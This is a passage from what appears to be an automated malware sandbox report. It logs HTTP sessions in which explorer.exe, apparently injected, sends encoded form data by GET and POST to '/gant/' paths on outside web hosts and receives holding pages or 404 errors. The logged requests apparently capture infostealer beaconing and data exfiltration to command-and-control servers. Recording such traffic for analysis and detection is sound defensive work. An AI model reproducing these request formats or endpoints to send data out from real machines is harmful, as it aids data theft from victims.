                                                                                                                  Data Ascii: JYr1yvYsIbW~Dv_cQjGpGeLUS(bdZCv4DgPgrvx8cTQYkC0x6pQq6tRVw8nGXvNpmXcq2eYjjl8hiC5NlYywM1VEJD6Y7RNLWtkcsyCCEN7ZPwLCC6foR0_lye86w~cpEOlKki-F42o(noFmbNymYQA3ZEQ3iDRBw8SDCrEsSQRQar8XwNmKho5eab-LlQo51(C544SzDvXUiHjgb~aSYNsFItTkIdaOWegxfYXGWfWXBdyZkke
                                                                                                                  Feb 13, 2023 19:01:13.944947004 CET815OUTData Raw: 6a 73 4f 71 76 53 32 65 5a 77 66 4f 67 55 74 73 45 7e 5f 65 70 7a 30 4b 2d 74 62 6f 56 56 58 39 57 4c 6c 56 41 67 6a 7a 4f 4d 71 63 42 37 55 4f 42 71 79 46 76 6a 4c 67 6e 63 6c 6f 4b 71 54 69 6f 71 5a 36 65 4a 41 63 71 48 74 32 59 76 71 72 5f 46
                                                                                                                  Data Ascii: jsOqvS2eZwfOgUtsE~_epz0K-tboVVX9WLlVAgjzOMqcB7UOBqyFvjLgncloKqTioqZ6eJAcqHt2Yvqr_FK2wumYSTMekfZ6EIy8B(qnHIpaC2WbK9dDDvMwd8B4Ka6U16GySjg~DHgma4ZIb0ff9lxTMAYsWR0SpdvM222jqc2pMUL6u8WLdOuscZ8iiswtuMSz8kun4Zicx(xtxSv~SybhArbBFPmRWzdOHFK8expLrnRH-qS
                                                                                                                  Feb 13, 2023 19:01:13.945102930 CET819OUTData Raw: 4b 6f 2d 33 41 6f 5a 34 43 70 64 44 62 57 2d 30 30 61 66 76 66 32 6a 6b 53 70 7a 79 41 63 6c 7a 33 76 77 67 50 28 30 4c 72 63 41 30 54 56 6b 35 47 46 6b 64 49 43 4e 37 49 33 4a 6a 46 68 5a 4f 58 53 72 34 45 6d 59 50 4f 48 49 48 66 52 44 6a 57 52
                                                                                                                  Data Ascii: Ko-3AoZ4CpdDbW-00afvf2jkSpzyAclz3vwgP(0LrcA0TVk5GFkdICN7I3JjFhZOXSr4EmYPOHIHfRDjWRqFJNqtkyqugVTibkWv3C-hzvX4vNf8KwbdUTcqEFJuKFAPkPNH_sCf-j9Gv4b4nipvJz_qrg3GD4bq-jfhTNNa65_OuhAdvNyql9LFSt8KmmXrsnGr_SDsebzO-QqeWs5meb5lM6kZ7zzCkwntmgU1T1OZQ~6hG1i
                                                                                                                  Feb 13, 2023 19:01:14.246932030 CET820OUTData Raw: 6b 56 49 66 44 47 78 63 42 6a 4d 75 79 69 58 79 72 45 65 31 62 30 6c 65 75 28 6a 6f 63 6f 70 6b 74 75 78 56 39 4d 67 72 7a 31 68 6f 47 68 71 61 65 59 39 46 52 78 6e 37 4b 50 78 4e 33 79 38 56 33 68 6e 4d 65 67 6a 38 64 59 65 69 44 32 46 28 79 45
                                                                                                                  Data Ascii: kVIfDGxcBjMuyiXyrEe1b0leu(jocopktuxV9Mgrz1hoGhqaeY9FRxn7KPxN3y8V3hnMegj8dYeiD2F(yEHmbPmDvCS0Dh4Cgk9TrWIylwHcQZSSZSbgOY_Bd4-YJ4cObpfPh~zeFLuA6jE~bjb(6tCByYZBoyOMTfwBmN47cbYd3ara6wyZrcHrCYNu4DFe-llNZnfJfvZFlyRWvQuJqwwqdFReSKkLge8AY8enlqmDSVV11WA
                                                                                                                  Feb 13, 2023 19:01:14.343452930 CET823OUTData Raw: 79 4f 33 62 53 52 64 34 52 4e 67 63 44 39 48 45 78 70 36 6d 2d 77 75 31 79 39 33 54 6b 37 62 53 31 6d 6e 5a 6d 55 53 46 79 6d 5f 76 37 57 53 53 34 41 35 45 6b 52 45 63 4c 79 61 34 6c 45 53 43 77 36 6b 59 64 70 2d 31 75 4e 75 39 62 53 33 46 49 72
                                                                                                                  Data Ascii: yO3bSRd4RNgcD9HExp6m-wu1y93Tk7bS1mnZmUSFym_v7WSS4A5EkREcLya4lESCw6kYdp-1uNu9bS3FIr0ThFaNTVir_nhWG4Wh9jEdieAZ8FxsVNbHBkGkfCkXbpWO8U_Ix5_uwXnPfM6XmwhOB3E6STHtL8_aenxJc(_8Ee6(p~QGCDuw3hMqUyl0IHimQywGAQ8eHAbR8jzx57tPDfErcd4nWqhLs02mT6e6jLpBXCfpsfa
                                                                                                                  Feb 13, 2023 19:01:14.957669973 CET825INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:01:14 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  22192.168.11.2049864142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:16.379132032 CET826OUTGET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:01:16.824603081 CET834INData Raw: 69 74 65 20 69 73 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 43 6c 6f 73 65 64 20 66 6f 72 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65
                                                                                                                  Data Ascii: ite is Temporarily Closed for Construction"> </div> <div class="container"> <div class="row"> <div class="col-xs-12 col-md-12 col-lg-12"> <h1>Sorry, we're doing some work on the site</h1> </div>
                                                                                                                  Feb 13, 2023 19:01:16.824685097 CET834INData Raw: 61 20 66 61 2d 77 6f 72 64 70 72 65 73 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 0d 0a 0d 0a
                                                                                                                  Data Ascii: a fa-wordpress fa-2x" aria-hidden="true"></i></a></div>
                                                                                                                  Feb 13, 2023 19:01:16.953480005 CET836INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 2316
                                                                                                                  date: Mon, 13 Feb 2023 18:01:16 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 6b 65 20 56 69 65 77 20 41 75 74 6f 6d 61 61 74 69 6f 6e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 46 72 65 64 6f 6b 61 2b 4f 6e 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 6c 6f 73 65 64 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0d 0a 20 20 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 72 6f 2d 69 6d 61 67 65 22 3e 0d
                                                                                                                  Data Ascii: <title>Lake View Automaation is under construction</title> <link href="https://fonts.bunny.net/css?family=Fredoka+One" rel="stylesheet"> <link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/style.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.96" type="text/css"><link rel="icon" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/images/favicon.png" /> <div id="hero-image">
                                                                                                                  Feb 13, 2023 19:01:17.054172039 CET837INData Raw: 0a 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69
                                                                                                                  Data Ascii: <img src="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/closed.png" alt="Site is Temporarily Closed for Construction" title="Site is Temporarily Closed for Construction"> </div> <div cl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  23192.168.11.2049867217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:30.169212103 CET845OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.performingartshub.co.uk
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.performingartshub.co.uk/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 5a 50 6c 34 65 72 71 5a 4f 74 47 37 4c 57 61 50 59 78 28 73 43 63 55 6c 68 65 47 34 6a 37 51 36 4d 30 6b 67 6d 72 5a 61 59 57 35 4d 6c 75 74 67 35 47 64 7a 44 37 73 5f 4a 46 47 6a 70 45 68 53 55 51 28 42 5a 5f 6f 74 58 64 74 71 45 35 51 37 37 69 4e 64 76 72 36 66 78 71 68 35 42 74 6b 71 77 53 76 44 68 32 56 51 62 61 68 72 7a 70 72 4b 36 64 45 64 6a 55 46 73 5a 2d 64 41 37 65 53 33 38 48 63 58 39 61 43 50 54 39 62 59 7a 43 42 56 57 79 79 35 4e 6d 76 68 48 73 5a 55 31 59 50 42 43 45 6b 6d 39 41 6b 65 6d 79 4b 4f 62 51 36 52 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ZPl4erqZOtG7LWaPYx(sCcUlheG4j7Q6M0kgmrZaYW5Mlutg5GdzD7s_JFGjpEhSUQ(BZ_otXdtqE5Q77iNdvr6fxqh5BtkqwSvDh2VQbahrzprK6dEdjUFsZ-dA7eS38HcX9aCPT9bYzCBVWyy5NmvhHsZU1YPBCEkm9AkemyKObQ6RXQ).
                                                                                                                  Feb 13, 2023 19:01:30.196800947 CET846INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:30 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  24192.168.11.2049868217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:32.711481094 CET847OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.performingartshub.co.uk
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.performingartshub.co.uk/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 5a 50 6c 34 65 72 71 5a 4f 74 47 37 49 32 4b 50 5a 54 58 73 4b 63 55 6d 6b 65 47 34 6f 62 51 32 4d 7a 73 67 6d 75 6f 64 59 45 74 4d 6c 4c 4a 67 34 48 64 7a 45 37 73 5f 52 56 47 6d 6e 6b 68 5a 55 51 6a 5f 5a 37 6f 74 58 64 4a 71 4b 72 59 37 77 79 4e 43 6e 4c 36 65 6d 61 68 38 46 74 6b 67 77 53 69 67 68 33 42 51 62 70 31 72 79 72 44 4b 72 59 34 65 70 6b 46 75 64 4f 64 44 31 2d 53 44 38 41 55 6c 39 65 44 34 54 4d 66 59 77 69 68 56 58 79 79 2d 48 57 75 49 4b 4d 59 48 77 70 71 58 4a 30 41 39 72 53 63 63 68 41 48 48 66 6a 54 5f 41 2d 58 30 37 78 4a 74 50 47 36 73 54 7a 4c 31 77 71 5a 41 67 73 4f 5f 4f 53 41 34 32 49 63 52 78 30 63 45 4b 79 55 44 5a 63 6e 75 47 53 31 43 72 66 31 79 4b 42 47 34 63 55 77 77 76 47 52 70 7a 4f 52 35 52 43 5a 66 4f 58 57 77 62 31 6b 46 56 65 36 4b 56 51 55 63 47 7a 76 55 71 4e 4b 75 70 64 73 6f 63 6e 51 70 42 68 6f 31 71 58 5a 4c 78 5f 34 57 6f 73 39 2d 37 31 5a 34 54 74 4d 47 4f 6c 66 69 4c 38 75 77 51 6b 63 42 5a 6a 43 53 64 51 73 63 71 4c 54 7a 67 53 77 34 53 68 4a 33 46 6a 44 4a 6a 7a 70 76 69 48 66 39 46 6e 6d 4e 63 65 48 6d 78 6a 7a 46 6c 57 4d 6e 31 41 45 62 6d 47 64 32 4e 6a 4d 6c 73 49 33 4b 58 54 6b 58 4c 54 71 59 79 4d 68 35 32 4b 7e 44 6d 61 45 74 63 52 7e 57 31 41 76 52 58 72 62 37 4a 69 65 5f 6e 63 54 4c 66 58 64 65 6a 68 42 57 42 65 53 5a 6e 35 69 2d 6d 52 72 53 73 76 75 59 32 32 77 47 50 65 61 63 52 75 66 7a 71 64 28 55 74 71 58 5a 37 55 59 43 73 41 31 61 63 73 35 51 38 49 35 38 35 66 28 45 31 62 5a 2d 31 45 7a 6b 48 37 33 31 59 74 35 63 38 4d 34 43 66 4e 31 79 74 68 28 55 43 76 36 46 59 35 45 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ZPl4erqZOtG7I2KPZTXsKcUmkeG4obQ2MzsgmuodYEtMlLJg4HdzE7s_RVGmnkhZUQj_Z7otXdJqKrY7wyNCnL6emah8FtkgwSigh3BQbp1ryrDKrY4epkFudOdD1-SD8AUl9eD4TMfYwihVXyy-HWuIKMYHwpqXJ0A9rScchAHHfjT_A-X07xJtPG6sTzL1wqZAgsO_OSA42IcRx0cEKyUDZcnuGS1Crf1yKBG4cUwwvGRpzOR5RCZfOXWwb1kFVe6KVQUcGzvUqNKupdsocnQpBho1qXZLx_4Wos9-71Z4TtMGOlfiL8uwQkcBZjCSdQscqLTzgSw4ShJ3FjDJjzpviHf9FnmNceHmxjzFlWMn1AEbmGd2NjMlsI3KXTkXLTqYyMh52K~DmaEtcR~W1AvRXrb7Jie_ncTLfXdejhBWBeSZn5i-mRrSsvuY22wGPeacRufzqd(UtqXZ7UYCsA1acs5Q8I585f(E1bZ-1EzkH731Yt5c8M4CfN1yth(UCv6FY5E.
                                                                                                                  Feb 13, 2023 19:01:32.735573053 CET848INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:01:32 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  25192.168.11.2049869217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:35.258847952 CET850OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
